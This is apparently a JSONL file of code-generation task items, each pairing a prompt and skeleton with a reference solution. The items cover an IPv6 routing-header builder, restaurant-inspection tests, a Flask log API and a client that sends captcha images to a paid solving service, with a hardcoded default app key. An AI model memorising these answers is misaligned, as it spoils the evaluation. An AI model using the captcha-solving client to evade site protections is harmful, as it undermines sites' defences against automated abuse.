rthdr0(self, seg=1, bytes=None):\n \"\"\"IPv6 routing extension header type 0\"\"\"\n reserved = pcs.Field('reserved', 32, default=0)\n header = [reserved]\n for i in range(seg):\n header.append(pcs.StringField('address' + str(i), 128))\n pcs.Packet.__add__(self, header)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/pcs/packets/ipv6.py", "source_repo": "bilouro/tcptest", "split": "test", "star_events_count": 0} {"blob_id": "a4254479ee9ae1661f588d95bf8a1a5f8405f8f4", "bodies": ["best_data = {'cuisine_primary': ['thai'], 'restaurant': ['thai garden'], 'boro': ['manhattan'], 'swc_type': ['no cafe'], 'score': [0], 'grade': ['a'], 'inspectiondate': ['1/2/2014']}\nbest_restaurant = pd.DataFrame(best_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\nbest_restaurant['inspectiondate'] = pd.to_datetime(best_restaurant['inspectiondate'], format='%m/%d/%Y')\nbest_restaurant = best_restaurant.set_index('restaurant')\nnpt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[0], best_restaurant)", "worst_data = {'cuisine_primary': ['pizza'], 'restaurant': [\"'za for days\"], 'boro': ['brooklyn'], 'swc_type': ['no cafe'], 'score': [100], 'grade': ['c'], 'inspectiondate': ['3/7/2012']}\nworst_restaurant = pd.DataFrame(worst_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\nworst_restaurant['inspectiondate'] = pd.to_datetime(worst_restaurant['inspectiondate'], format='%m/%d/%Y')\nworst_restaurant = worst_restaurant.set_index('restaurant')\nnpt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[1], worst_restaurant)"], "bodies_text": "<|body_start_0|>\n best_data = {'cuisine_primary': ['thai'], 'restaurant': ['thai garden'], 'boro': ['manhattan'], 'swc_type': ['no cafe'], 'score': [0], 'grade': ['a'], 'inspectiondate': ['1/2/2014']}\n best_restaurant = pd.DataFrame(best_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n best_restaurant['inspectiondate'] = pd.to_datetime(best_restaurant['inspectiondate'], format='%m/%d/%Y')\n best_restaurant = best_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[0], best_restaurant)\n<|end_body_0|>\n\n<|body_start_1|>\n worst_data = {'cuisine_primary': ['pizza'], 'restaurant': [\"'za for days\"], 'boro': ['brooklyn'], 'swc_type': ['no cafe'], 'score': [100], 'grade': ['c'], 'inspectiondate': ['3/7/2012']}\n worst_restaurant = pd.DataFrame(worst_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n worst_restaurant['inspectiondate'] = pd.to_datetime(worst_restaurant['inspectiondate'], format='%m/%d/%Y')\n worst_restaurant = worst_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[1], worst_restaurant)\n<|end_body_1|>\n", "class_docstring": "Check that get_best_and_worst_data returns the DataFrames of the best and worst restaurants Note: To check for equality of a tuple (DataFrame, DataFrame), I unpack and check each DataFrame individually", "class_name": "GetBestAndWorstDataTests", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GetBestAndWorstDataTests:\n \"\"\"Check that get_best_and_worst_data returns the DataFrames of the best and worst restaurants Note: To check for equality of a tuple (DataFrame, DataFrame), I unpack and check each DataFrame individually\"\"\"\n\n def test_get_best_data(self):\n \"\"\"Test that the function correctly returns the observations of the best restaurant\"\"\"\n <|body_0|>\n\n def test_get_worst_data(self):\n \"\"\"Test that the function correctly returns the observations of the worst restaurant\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n best_data = {'cuisine_primary': ['thai'], 'restaurant': ['thai garden'], 'boro': ['manhattan'], 'swc_type': ['no cafe'], 'score': [0], 'grade': ['a'], 'inspectiondate': ['1/2/2014']}\n best_restaurant = pd.DataFrame(best_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n best_restaurant['inspectiondate'] = pd.to_datetime(best_restaurant['inspectiondate'], format='%m/%d/%Y')\n best_restaurant = best_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[0], best_restaurant)\n<|end_body_0|>\n\n<|body_start_1|>\n worst_data = {'cuisine_primary': ['pizza'], 'restaurant': [\"'za for days\"], 'boro': ['brooklyn'], 'swc_type': ['no cafe'], 'score': [100], 'grade': ['c'], 'inspectiondate': ['3/7/2012']}\n worst_restaurant = pd.DataFrame(worst_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n worst_restaurant['inspectiondate'] = pd.to_datetime(worst_restaurant['inspectiondate'], format='%m/%d/%Y')\n worst_restaurant = worst_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[1], worst_restaurant)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000120", "length_bytes": 6403, "license_type": "no_license", "methods": [{"docstring": "Test that the function correctly returns the observations of the best restaurant", "name": "test_get_best_data", "signature": "def test_get_best_data(self)"}, {"docstring": "Test that the function correctly returns the observations of the worst restaurant", "name": "test_get_worst_data", "signature": "def test_get_worst_data(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004566", "prompt": "Implement the Python class `GetBestAndWorstDataTests` described below.\n\nClass description:\nCheck that get_best_and_worst_data returns the DataFrames of the best and worst restaurants Note: To check for equality of a tuple (DataFrame, DataFrame), I unpack and check each DataFrame individually\n\nMethod signatures and docstrings:\n- def test_get_best_data(self): Test that the function correctly returns the observations of the best restaurant\n- def test_get_worst_data(self): Test that the function correctly returns the observations of the worst restaurant", "prompted_full_text": "Implement the Python class `GetBestAndWorstDataTests` described below.\n\nClass description:\nCheck that get_best_and_worst_data returns the DataFrames of the best and worst restaurants Note: To check for equality of a tuple (DataFrame, DataFrame), I unpack and check each DataFrame individually\n\nMethod signatures and docstrings:\n- def test_get_best_data(self): Test that the function correctly returns the observations of the best restaurant\n- def test_get_worst_data(self): Test that the function correctly returns the observations of the worst restaurant\n\n<|skeleton|>\nclass GetBestAndWorstDataTests:\n \"\"\"Check that get_best_and_worst_data returns the DataFrames of the best and worst restaurants Note: To check for equality of a tuple (DataFrame, DataFrame), I unpack and check each DataFrame individually\"\"\"\n\n def test_get_best_data(self):\n \"\"\"Test that the function correctly returns the observations of the best restaurant\"\"\"\n <|body_0|>\n\n def test_get_worst_data(self):\n \"\"\"Test that the function correctly returns the observations of the worst restaurant\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n best_data = {'cuisine_primary': ['thai'], 'restaurant': ['thai garden'], 'boro': ['manhattan'], 'swc_type': ['no cafe'], 'score': [0], 'grade': ['a'], 'inspectiondate': ['1/2/2014']}\n best_restaurant = pd.DataFrame(best_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n best_restaurant['inspectiondate'] = pd.to_datetime(best_restaurant['inspectiondate'], format='%m/%d/%Y')\n best_restaurant = best_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[0], best_restaurant)\n<|end_body_0|>\n\n<|body_start_1|>\n worst_data = {'cuisine_primary': ['pizza'], 'restaurant': [\"'za for days\"], 'boro': ['brooklyn'], 'swc_type': ['no cafe'], 'score': [100], 'grade': ['c'], 'inspectiondate': ['3/7/2012']}\n worst_restaurant = pd.DataFrame(worst_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n worst_restaurant['inspectiondate'] = pd.to_datetime(worst_restaurant['inspectiondate'], format='%m/%d/%Y')\n worst_restaurant = worst_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[1], worst_restaurant)\n<|end_body_1|>\n", "revision_id": "dc9185cbc5e65650d985ebecf877a157c8c19a13", "skeleton": "<|skeleton|>\nclass GetBestAndWorstDataTests:\n \"\"\"Check that get_best_and_worst_data returns the DataFrames of the best and worst restaurants Note: To check for equality of a tuple (DataFrame, DataFrame), I unpack and check each DataFrame individually\"\"\"\n\n def test_get_best_data(self):\n \"\"\"Test that the function correctly returns the observations of the best restaurant\"\"\"\n <|body_0|>\n\n def test_get_worst_data(self):\n \"\"\"Test that the function correctly returns the observations of the worst restaurant\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GetBestAndWorstDataTests:\n \"\"\"Check that get_best_and_worst_data returns the DataFrames of the best and worst restaurants Note: To check for equality of a tuple (DataFrame, DataFrame), I unpack and check each DataFrame individually\"\"\"\n\n def test_get_best_data(self):\n \"\"\"Test that the function correctly returns the observations of the best restaurant\"\"\"\n best_data = {'cuisine_primary': ['thai'], 'restaurant': ['thai garden'], 'boro': ['manhattan'], 'swc_type': ['no cafe'], 'score': [0], 'grade': ['a'], 'inspectiondate': ['1/2/2014']}\n best_restaurant = pd.DataFrame(best_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n best_restaurant['inspectiondate'] = pd.to_datetime(best_restaurant['inspectiondate'], format='%m/%d/%Y')\n best_restaurant = best_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[0], best_restaurant)\n\n def test_get_worst_data(self):\n \"\"\"Test that the function correctly returns the observations of the worst restaurant\"\"\"\n worst_data = {'cuisine_primary': ['pizza'], 'restaurant': [\"'za for days\"], 'boro': ['brooklyn'], 'swc_type': ['no cafe'], 'score': [100], 'grade': ['c'], 'inspectiondate': ['3/7/2012']}\n worst_restaurant = pd.DataFrame(worst_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n worst_restaurant['inspectiondate'] = pd.to_datetime(worst_restaurant['inspectiondate'], format='%m/%d/%Y')\n worst_restaurant = worst_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[1], worst_restaurant)\n", "source": "the_stack_v2_python_sparse", "source_path": "lh1036/test_inspectiongrades/test_visualizer.py", "source_repo": "ds-ga-1007/final_project", "split": "test", "star_events_count": 0} {"blob_id": "61dee8bbdd3e224d3d43d1c325a9de341ffd7bcf", "bodies": ["self.base_url = 'http://api.yundama.com/api.php'\nself.base_headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)', 'Host': 'api.yundama.com', 'Referer': 'http://www.yundama.com/download/YDMHttp.html', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Origin': 'http://www.yundama.com'}\nself.user_name = user_name\nself.pass_word = pass_word\nself.appid = '1' if not appid else appid\nself.appkey = '22cc5376925e9387a23cf797cb9ba745' if not appkey else appkey\nreturn", "cid = self.upload(file_name, file_bytes, file_type, codetype)\nif not cid:\n return (None, None)\nwhile repeat > 0:\n code = self.result(cid)\n if code:\n return (cid, code)\n repeat -= 1\n time.sleep(2)\nreturn (cid, None)", "post_data = {'username': self.user_name, 'password': self.pass_word, 'codetype': codetype, 'appid': self.appid, 'appkey': self.appkey, 'timeout': 60, 'method': 'upload'}\nfiles = {'file': (file_name, file_bytes, file_type)}\ntry:\n response = requests.post(self.base_url, data=post_data, headers=self.base_headers, files=files)\n json_data = response.json()\nexcept Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\nlogging.warning('YunDaMa upload %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\nreturn json_data.get('cid', '')", "try:\n response = requests.get(self.base_url + '?cid=%d&method=result' % cid, headers=self.base_headers)\n json_data = response.json()\nexcept Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\nlogging.warning('YunDaMa result %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\nreturn json_data.get('text', '')"], "bodies_text": "<|body_start_0|>\n self.base_url = 'http://api.yundama.com/api.php'\n self.base_headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)', 'Host': 'api.yundama.com', 'Referer': 'http://www.yundama.com/download/YDMHttp.html', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Origin': 'http://www.yundama.com'}\n self.user_name = user_name\n self.pass_word = pass_word\n self.appid = '1' if not appid else appid\n self.appkey = '22cc5376925e9387a23cf797cb9ba745' if not appkey else appkey\n return\n<|end_body_0|>\n\n<|body_start_1|>\n cid = self.upload(file_name, file_bytes, file_type, codetype)\n if not cid:\n return (None, None)\n while repeat > 0:\n code = self.result(cid)\n if code:\n return (cid, code)\n repeat -= 1\n time.sleep(2)\n return (cid, None)\n<|end_body_1|>\n\n<|body_start_2|>\n post_data = {'username': self.user_name, 'password': self.pass_word, 'codetype': codetype, 'appid': self.appid, 'appkey': self.appkey, 'timeout': 60, 'method': 'upload'}\n files = {'file': (file_name, file_bytes, file_type)}\n try:\n response = requests.post(self.base_url, data=post_data, headers=self.base_headers, files=files)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa upload %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('cid', '')\n<|end_body_2|>\n\n<|body_start_3|>\n try:\n response = requests.get(self.base_url + '?cid=%d&method=result' % cid, headers=self.base_headers)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa result %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('text', '')\n<|end_body_3|>\n", "class_docstring": "class of YunDaMa, to identify captcha by yundama.com", "class_name": "YunDaMa", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass YunDaMa:\n \"\"\"class of YunDaMa, to identify captcha by yundama.com\"\"\"\n\n def __init__(self, user_name, pass_word, appid=None, appkey=None):\n \"\"\"constructor\"\"\"\n <|body_0|>\n\n def get_captcha(self, file_name, file_bytes, file_type='image/jpeg', codetype='1000', repeat=10):\n \"\"\"get captcha result(cid, code), based on file_name, file_bytes, file_type :key: http://www.yundama.com/apidoc/YDM_ErrorCode.html :param codetype: http://www.yundama.com/price.html\"\"\"\n <|body_1|>\n\n def upload(self, file_name, file_bytes, file_type, codetype):\n \"\"\"upload image file, return cid or None\"\"\"\n <|body_2|>\n\n def result(self, cid):\n \"\"\"get result from cid, return code or None\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.base_url = 'http://api.yundama.com/api.php'\n self.base_headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)', 'Host': 'api.yundama.com', 'Referer': 'http://www.yundama.com/download/YDMHttp.html', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Origin': 'http://www.yundama.com'}\n self.user_name = user_name\n self.pass_word = pass_word\n self.appid = '1' if not appid else appid\n self.appkey = '22cc5376925e9387a23cf797cb9ba745' if not appkey else appkey\n return\n<|end_body_0|>\n\n<|body_start_1|>\n cid = self.upload(file_name, file_bytes, file_type, codetype)\n if not cid:\n return (None, None)\n while repeat > 0:\n code = self.result(cid)\n if code:\n return (cid, code)\n repeat -= 1\n time.sleep(2)\n return (cid, None)\n<|end_body_1|>\n\n<|body_start_2|>\n post_data = {'username': self.user_name, 'password': self.pass_word, 'codetype': codetype, 'appid': self.appid, 'appkey': self.appkey, 'timeout': 60, 'method': 'upload'}\n files = {'file': (file_name, file_bytes, file_type)}\n try:\n response = requests.post(self.base_url, data=post_data, headers=self.base_headers, files=files)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa upload %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('cid', '')\n<|end_body_2|>\n\n<|body_start_3|>\n try:\n response = requests.get(self.base_url + '?cid=%d&method=result' % cid, headers=self.base_headers)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa result %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('text', '')\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000121", "length_bytes": 3324, "license_type": "permissive", "methods": [{"docstring": "constructor", "name": "__init__", "signature": "def __init__(self, user_name, pass_word, appid=None, appkey=None)"}, {"docstring": "get captcha result(cid, code), based on file_name, file_bytes, file_type :key: http://www.yundama.com/apidoc/YDM_ErrorCode.html :param codetype: http://www.yundama.com/price.html", "name": "get_captcha", "signature": "def get_captcha(self, file_name, file_bytes, file_type='image/jpeg', codetype='1000', repeat=10)"}, {"docstring": "upload image file, return cid or None", "name": "upload", "signature": "def upload(self, file_name, file_bytes, file_type, codetype)"}, {"docstring": "get result from cid, return code or None", "name": "result", "signature": "def result(self, cid)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_005150", "prompt": "Implement the Python class `YunDaMa` described below.\n\nClass description:\nclass of YunDaMa, to identify captcha by yundama.com\n\nMethod signatures and docstrings:\n- def __init__(self, user_name, pass_word, appid=None, appkey=None): constructor\n- def get_captcha(self, file_name, file_bytes, file_type='image/jpeg', codetype='1000', repeat=10): get captcha result(cid, code), based on file_name, file_bytes, file_type :key: http://www.yundama.com/apidoc/YDM_ErrorCode.html :param codetype: http://www.yundama.com/price.html\n- def upload(self, file_name, file_bytes, file_type, codetype): upload image file, return cid or None\n- def result(self, cid): get result from cid, return code or None", "prompted_full_text": "Implement the Python class `YunDaMa` described below.\n\nClass description:\nclass of YunDaMa, to identify captcha by yundama.com\n\nMethod signatures and docstrings:\n- def __init__(self, user_name, pass_word, appid=None, appkey=None): constructor\n- def get_captcha(self, file_name, file_bytes, file_type='image/jpeg', codetype='1000', repeat=10): get captcha result(cid, code), based on file_name, file_bytes, file_type :key: http://www.yundama.com/apidoc/YDM_ErrorCode.html :param codetype: http://www.yundama.com/price.html\n- def upload(self, file_name, file_bytes, file_type, codetype): upload image file, return cid or None\n- def result(self, cid): get result from cid, return code or None\n\n<|skeleton|>\nclass YunDaMa:\n \"\"\"class of YunDaMa, to identify captcha by yundama.com\"\"\"\n\n def __init__(self, user_name, pass_word, appid=None, appkey=None):\n \"\"\"constructor\"\"\"\n <|body_0|>\n\n def get_captcha(self, file_name, file_bytes, file_type='image/jpeg', codetype='1000', repeat=10):\n \"\"\"get captcha result(cid, code), based on file_name, file_bytes, file_type :key: http://www.yundama.com/apidoc/YDM_ErrorCode.html :param codetype: http://www.yundama.com/price.html\"\"\"\n <|body_1|>\n\n def upload(self, file_name, file_bytes, file_type, codetype):\n \"\"\"upload image file, return cid or None\"\"\"\n <|body_2|>\n\n def result(self, cid):\n \"\"\"get result from cid, return code or None\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.base_url = 'http://api.yundama.com/api.php'\n self.base_headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)', 'Host': 'api.yundama.com', 'Referer': 'http://www.yundama.com/download/YDMHttp.html', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Origin': 'http://www.yundama.com'}\n self.user_name = user_name\n self.pass_word = pass_word\n self.appid = '1' if not appid else appid\n self.appkey = '22cc5376925e9387a23cf797cb9ba745' if not appkey else appkey\n return\n<|end_body_0|>\n\n<|body_start_1|>\n cid = self.upload(file_name, file_bytes, file_type, codetype)\n if not cid:\n return (None, None)\n while repeat > 0:\n code = self.result(cid)\n if code:\n return (cid, code)\n repeat -= 1\n time.sleep(2)\n return (cid, None)\n<|end_body_1|>\n\n<|body_start_2|>\n post_data = {'username': self.user_name, 'password': self.pass_word, 'codetype': codetype, 'appid': self.appid, 'appkey': self.appkey, 'timeout': 60, 'method': 'upload'}\n files = {'file': (file_name, file_bytes, file_type)}\n try:\n response = requests.post(self.base_url, data=post_data, headers=self.base_headers, files=files)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa upload %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('cid', '')\n<|end_body_2|>\n\n<|body_start_3|>\n try:\n response = requests.get(self.base_url + '?cid=%d&method=result' % cid, headers=self.base_headers)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa result %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('text', '')\n<|end_body_3|>\n", "revision_id": "d7981ba9806cf89200ce249f727aabf96918b67d", "skeleton": "<|skeleton|>\nclass YunDaMa:\n \"\"\"class of YunDaMa, to identify captcha by yundama.com\"\"\"\n\n def __init__(self, user_name, pass_word, appid=None, appkey=None):\n \"\"\"constructor\"\"\"\n <|body_0|>\n\n def get_captcha(self, file_name, file_bytes, file_type='image/jpeg', codetype='1000', repeat=10):\n \"\"\"get captcha result(cid, code), based on file_name, file_bytes, file_type :key: http://www.yundama.com/apidoc/YDM_ErrorCode.html :param codetype: http://www.yundama.com/price.html\"\"\"\n <|body_1|>\n\n def upload(self, file_name, file_bytes, file_type, codetype):\n \"\"\"upload image file, return cid or None\"\"\"\n <|body_2|>\n\n def result(self, cid):\n \"\"\"get result from cid, return code or None\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class YunDaMa:\n \"\"\"class of YunDaMa, to identify captcha by yundama.com\"\"\"\n\n def __init__(self, user_name, pass_word, appid=None, appkey=None):\n \"\"\"constructor\"\"\"\n self.base_url = 'http://api.yundama.com/api.php'\n self.base_headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)', 'Host': 'api.yundama.com', 'Referer': 'http://www.yundama.com/download/YDMHttp.html', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Origin': 'http://www.yundama.com'}\n self.user_name = user_name\n self.pass_word = pass_word\n self.appid = '1' if not appid else appid\n self.appkey = '22cc5376925e9387a23cf797cb9ba745' if not appkey else appkey\n return\n\n def get_captcha(self, file_name, file_bytes, file_type='image/jpeg', codetype='1000', repeat=10):\n \"\"\"get captcha result(cid, code), based on file_name, file_bytes, file_type :key: http://www.yundama.com/apidoc/YDM_ErrorCode.html :param codetype: http://www.yundama.com/price.html\"\"\"\n cid = self.upload(file_name, file_bytes, file_type, codetype)\n if not cid:\n return (None, None)\n while repeat > 0:\n code = self.result(cid)\n if code:\n return (cid, code)\n repeat -= 1\n time.sleep(2)\n return (cid, None)\n\n def upload(self, file_name, file_bytes, file_type, codetype):\n \"\"\"upload image file, return cid or None\"\"\"\n post_data = {'username': self.user_name, 'password': self.pass_word, 'codetype': codetype, 'appid': self.appid, 'appkey': self.appkey, 'timeout': 60, 'method': 'upload'}\n files = {'file': (file_name, file_bytes, file_type)}\n try:\n response = requests.post(self.base_url, data=post_data, headers=self.base_headers, files=files)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa upload %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('cid', '')\n\n def result(self, cid):\n \"\"\"get result from cid, return code or None\"\"\"\n try:\n response = requests.get(self.base_url + '?cid=%d&method=result' % cid, headers=self.base_headers)\n json_data = response.json()\n except Exception as excep:\n json_data = {'ret': -1, 'errMsg': excep}\n logging.warning('YunDaMa result %s: %s', 'succeed' if json_data['ret'] == 0 else 'failed', json_data)\n return json_data.get('text', '')\n", "source": "the_stack_v2_python_sparse", "source_path": "cola/utilities/yundama.py", "source_repo": "brightgems/cola", "split": "test", "star_events_count": 1} {"blob_id": "94bee6a377ebd61106d4c5da29f84a1645f56fda", "bodies": ["args = parser.parse_args()\nrequest_id = args.get('request_id')\nstatus_num = args.get('status_num')\npage = args.get('pgnum')\nif not page:\n page = 1\noptions = {'page': page, 'request_id': request_id, 'status_num': status_num}\nif log_list_c(options=options):\n request_logs, pg = log_list_c(options=options)\n response_data['code'] = 1200\n response_data['ok'] = True\n response_data['data'] = request_logs\n response_data['msg'] = '获取日志信息成功'\n response_data['pg'] = pg\n return response_data\nelse:\n response_data['code'] = 1204\n response_data['msg'] = '搜索日志结果不存在'\n response_data['ok'] = False\n response_data['data'] = ''\n response_data['pg'] = ''\n return response_data", "response_data['data'] = ''\nresponse_data['pg'] = ''\nif id:\n result = log_delete_c(id=id)\n if result:\n response_data['msg'] = '删除成功'\n response_data['ok'] = True\n response_data['code'] = 1200\n else:\n response_data['msg'] = '不存在的请求日志ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\nelse:\n response_data['msg'] = '请输入ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data"], "bodies_text": "<|body_start_0|>\n args = parser.parse_args()\n request_id = args.get('request_id')\n status_num = args.get('status_num')\n page = args.get('pgnum')\n if not page:\n page = 1\n options = {'page': page, 'request_id': request_id, 'status_num': status_num}\n if log_list_c(options=options):\n request_logs, pg = log_list_c(options=options)\n response_data['code'] = 1200\n response_data['ok'] = True\n response_data['data'] = request_logs\n response_data['msg'] = '获取日志信息成功'\n response_data['pg'] = pg\n return response_data\n else:\n response_data['code'] = 1204\n response_data['msg'] = '搜索日志结果不存在'\n response_data['ok'] = False\n response_data['data'] = ''\n response_data['pg'] = ''\n return response_data\n<|end_body_0|>\n\n<|body_start_1|>\n response_data['data'] = ''\n response_data['pg'] = ''\n if id:\n result = log_delete_c(id=id)\n if result:\n response_data['msg'] = '删除成功'\n response_data['ok'] = True\n response_data['code'] = 1200\n else:\n response_data['msg'] = '不存在的请求日志ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n else:\n response_data['msg'] = '请输入ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n<|end_body_1|>\n", "class_docstring": "", "class_name": "LogRequest", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LogRequest:\n\n def get(self):\n \"\"\"获取请求日志信息 --- tags: - logs summary: Add a new pet to the store parameters: - in: query name: request_id type: string description: 请求id - in: query name: page type: int description: 页码 - name: status type: int in: query description: 状态码 responses: 200: description: A single logs item schema: id: RequestLog properties: username: type: string description: The name of the user default: Steven Wilson\"\"\"\n <|body_0|>\n\n def delete(self, id=None):\n \"\"\"根据请求日志id删除信息 --- tags: - logs parameters: - in: path name: id type: integer format: int64 required: true responses: 200: description: 根据请求日志id删除信息 schema: id: RequestLog properties: username: type: string description: The name of the request_logs default: Steven Wilson\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n args = parser.parse_args()\n request_id = args.get('request_id')\n status_num = args.get('status_num')\n page = args.get('pgnum')\n if not page:\n page = 1\n options = {'page': page, 'request_id': request_id, 'status_num': status_num}\n if log_list_c(options=options):\n request_logs, pg = log_list_c(options=options)\n response_data['code'] = 1200\n response_data['ok'] = True\n response_data['data'] = request_logs\n response_data['msg'] = '获取日志信息成功'\n response_data['pg'] = pg\n return response_data\n else:\n response_data['code'] = 1204\n response_data['msg'] = '搜索日志结果不存在'\n response_data['ok'] = False\n response_data['data'] = ''\n response_data['pg'] = ''\n return response_data\n<|end_body_0|>\n\n<|body_start_1|>\n response_data['data'] = ''\n response_data['pg'] = ''\n if id:\n result = log_delete_c(id=id)\n if result:\n response_data['msg'] = '删除成功'\n response_data['ok'] = True\n response_data['code'] = 1200\n else:\n response_data['msg'] = '不存在的请求日志ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n else:\n response_data['msg'] = '请输入ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000122", "length_bytes": 3392, "license_type": "no_license", "methods": [{"docstring": "获取请求日志信息 --- tags: - logs summary: Add a new pet to the store parameters: - in: query name: request_id type: string description: 请求id - in: query name: page type: int description: 页码 - name: status type: int in: query description: 状态码 responses: 200: description: A single logs item schema: id: RequestLog properties: username: type: string description: The name of the user default: Steven Wilson", "name": "get", "signature": "def get(self)"}, {"docstring": "根据请求日志id删除信息 --- tags: - logs parameters: - in: path name: id type: integer format: int64 required: true responses: 200: description: 根据请求日志id删除信息 schema: id: RequestLog properties: username: type: string description: The name of the request_logs default: Steven Wilson", "name": "delete", "signature": "def delete(self, id=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006521", "prompt": "Implement the Python class `LogRequest` described below.\n\nClass description:\nImplement the LogRequest class.\n\nMethod signatures and docstrings:\n- def get(self): 获取请求日志信息 --- tags: - logs summary: Add a new pet to the store parameters: - in: query name: request_id 